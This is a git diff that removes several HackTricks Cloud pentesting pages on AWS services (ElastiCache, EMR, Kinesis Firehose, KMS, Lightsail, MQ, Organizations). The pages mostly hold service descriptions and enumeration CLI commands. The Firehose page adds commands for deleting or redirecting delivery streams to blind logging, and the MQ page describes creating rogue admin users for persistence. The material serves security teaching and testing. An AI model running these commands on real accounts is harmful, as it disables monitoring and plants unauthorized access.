- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ElastiCache - -AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. - -### Enumeration - -```bash -# ElastiCache clusters -## Check the SecurityGroups to later check who can access -## In Redis clusters: Check AuthTokenEnabled to see if you need password -## In memcache clusters: You can find the URL to connect -aws elasticache describe-cache-clusters - -# List all ElastiCache replication groups -## Find here the accesible URLs for Redis clusters -aws elasticache describe-replication-groups - -#List all ElastiCache parameter groups -aws elasticache describe-cache-parameter-groups - -#List all ElastiCache security groups -## If this gives an error it's because it's using SGs from EC2 -aws elasticache describe-cache-security-groups - -#List all ElastiCache subnet groups -aws elasticache describe-cache-subnet-groups - -# Get snapshots -aws elasticache describe-snapshots - -# Get users and groups -aws elasticache describe-user-groups -aws elasticache describe-users - -# List ElastiCache events -aws elasticache describe-events -``` - -### Privesc (TODO) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md deleted file mode 100644 index be430d055..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ /dev/null @@ -1,86 +0,0 @@ -# AWS - EMR Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EMR - -AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. - -Key characteristics include: - -* **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: - * **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. - * **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: - * Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. - * HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -* **Encryption in Transit**: Focuses on securing data during transfer. Options include: - * **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: - * **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. - * **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. - -Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: - -* **Hadoop**: - * Might reduce encrypted shuffle using TLS. - * Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. -* **Presto** (EMR version 5.6.0+): - * Internal communication between Presto nodes is secured using SSL and TLS. -* **Tez Shuffle Handler**: - * Utilizes TLS for encryption. -* **Spark**: - * Employs TLS for the Akka protocol. - * Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. - * External shuffle service is secured with the Simple Authentication Security Layer. - -These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. - -#### Enumeration - -```bash -aws emr list-clusters -aws emr describe-cluster --cluster-id -aws emr list-instances --cluster-id -aws emr list-instance-fleets --cluster-id -aws emr list-steps --cluster-id -aws emr list-notebook-executions -aws emr list-security-configurations -aws emr list-studios #Get studio URLs -``` - -#### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-emr-privesc.md" %} -[aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md) -{% endcontent-ref %} - -## References - -* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md deleted file mode 100644 index 34909d625..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md +++ /dev/null @@ -1,77 +0,0 @@ -# AWS - Kinesis Data Firehose Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kinesis Data Firehose - -Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. - -The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. - -### Enumeration - -```bash -# Get delivery streams -aws firehose list-delivery-streams - -# Get stream info -aws firehose describe-delivery-stream --delivery-stream-name -## Get roles -aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN -``` - -## Post-exploitation / Defense Bypass - -In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. - -### firehose:DeleteDeliveryStream - -``` -aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete -``` - -### firehose:UpdateDestination - -``` -aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id -``` - -### firehose:PutRecord | firehose:PutRecordBatch - -``` -aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' - -aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json -``` - -## References - -* [https://docs.amazonaws.cn/en\_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md deleted file mode 100644 index f1b5c3bdf..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ /dev/null @@ -1,183 +0,0 @@ -# AWS - KMS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - Key Management Service - -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. - -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. - -KMS is a **region specific service**. - -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. - -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. - -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. - -There are 2 types of master keys: - -* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. -* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. - -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. - -### Key Policies - -These defines **who can use and access a key in KMS**. - -By **default:** - -* It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. - - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. - - * Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. -* It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. - - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. -* It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: - -```json -{ - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" -} -``` - -{% hint style="warning" %} -If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. -{% endhint %} - -
- -Policy Details - -Properties of a policy: - -* JSON based document -* Resource --> Affected resources (can be "\*") -* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -* Effect --> Allow/Deny -* Principal --> arn affected -* Conditions (optional) --> Condition to give the permissions - -Grants: - -* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -* After the grant is created a GrantToken and a GratID are issued - -**Access**: - -* Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -* Via **IAM policy** -* Via **grants** - -
- -### Key Administrators - -Key administrator by default: - -* Have access to manage KMS but not to encrypt or decrypt data -* Only IAM users and roles can be added to Key Administrators list (not groups) -* If external CMK is used, Key Administrators have the permission to import key material - -### Rotation of CMKs - -* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -* **Older keys are retained** to decrypt data that was encrypted prior to the rotation -* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. - -#### Manual rotation - -* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -* You need to **keep old keys to decrypt old files** encrypted with it. - -You can import keys from your on-premises key infrastructure . - -### Other relevant KMS information - -KMS is priced per number of encryption/decryption requests received from all services per month. - -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. - -With KMS policy you can do the following: - -* Limit who can create data keys and which services have access to use these keys -* Limit systems access to encrypt only, decrypt only or both -* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). - -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -### Enumeration - -```bash -aws kms list-keys -aws kms list-key-policies --key-id -aws kms list-grants --key-id -aws kms describe-key --key-id -aws kms get-key-policy --key-id --policy-name # Default policy name is "default" -aws kms describe-custom-key-stores -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-kms-privesc.md" %} -[aws-kms-privesc.md](../aws-privilege-escalation/aws-kms-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-kms-persistence.md" %} -[aws-kms-persistence.md](../aws-persistence/aws-kms-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md deleted file mode 100644 index 3d2778ee1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# AWS - Lightsail Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS - Lightsail - -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. - -### Enumeration - -```bash -# Instances -aws lightsail get-instances #Get all -aws lightsail get-instance-port-states --instance-name #Get open ports - -# Databases -aws lightsail get-relational-databases -aws lightsail get-relational-database-snapshots -aws lightsail get-relational-database-parameters - -# Disk & snapshots -aws lightsail get-instance-snapshots -aws lightsail get-disk-snapshots -aws lightsail get-disks - -# More -aws lightsail get-load-balancers -aws lightsail get-static-ips -aws lightsail get-key-pairs -``` - -### Analyse Snapshots - -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). - -### Metadata - -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-lightsail-post-exploitation.md" %} -[aws-lightsail-post-exploitation.md](../aws-post-exploitation/aws-lightsail-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-lightsail-persistence.md" %} -[aws-lightsail-persistence.md](../aws-persistence/aws-lightsail-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md deleted file mode 100644 index 30e76cde6..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ /dev/null @@ -1,103 +0,0 @@ -# AWS - MQ Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Amazon MQ - -### Introduction to Message Brokers - -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. - -### AWS - RabbitMQ - -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. - -### AWS - ActiveMQ - -Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: - -* Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -* Leverage the **AMQP** protocol to integrate applications from different platforms. -* Use **STOMP** over websockets for web application message exchanges. -* Manage IoT devices with **MQTT**. -* Maintain existing **JMS** infrastructure and extend its capabilities. - -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. - -## Enumeration - -```bash -# List brokers -aws mq list-brokers - -# Get broker info -aws mq describe-broker --broker-id -## Find endpoints in .BrokerInstances -## Find if public accessible in .PubliclyAccessible - -# List usernames (only for ActiveMQ) -aws mq list-users --broker-id - -# Get user info (PASSWORD NOT INCLUDED) -aws mq describe-user --broker-id --username - -# Lits configurations (only for ActiveMQ) -aws mq list-configurations -## Here you can find if simple or LDAP authentication is used - -# Creacte Active MQ user -aws mq create-user --broker-id --password --username --console-access -``` - -{% hint style="warning" %} -TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) -{% endhint %} - -## Privesc - -{% content-ref url="../aws-privilege-escalation/aws-mq-privesc.md" %} -[aws-mq-privesc.md](../aws-privilege-escalation/aws-mq-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md" %} -[aws-mq-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. - -## References - -* [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) -* [https://activemq.apache.org/](https://activemq.apache.org/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md deleted file mode 100644 index 06598159d..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md +++ /dev/null @@ -1,73 +0,0 @@ -# AWS - Organizations Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Baisc Information - -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. - -Key Points: - -* **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -* **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -* **Account Grouping**: Accounts can be grouped together, making management more streamlined. -* **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. - -You can find more information in: - -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} - -```bash -# Get Org -aws organizations describe-organization -aws organizations list-roots - -# Get OUs, from root and from other OUs -aws organizations list-organizational-units-for-parent --parent-id r-lalala -aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get accounts -## List all the accounts without caring about the parent -aws organizations list-accounts -## Accounts from a parent -aws organizations list-accounts-for-parent --parent-id r-lalala -aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get basic account info -## You need the permission iam:GetAccountSummary -aws iam get-account-summary -``` - -## References - -* https://aws.amazon.com/organizations/ - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md deleted file mode 100644 index 13db530f0..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md +++ /dev/null @@ -1,50 +0,0 @@ -# AWS - Other Services Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
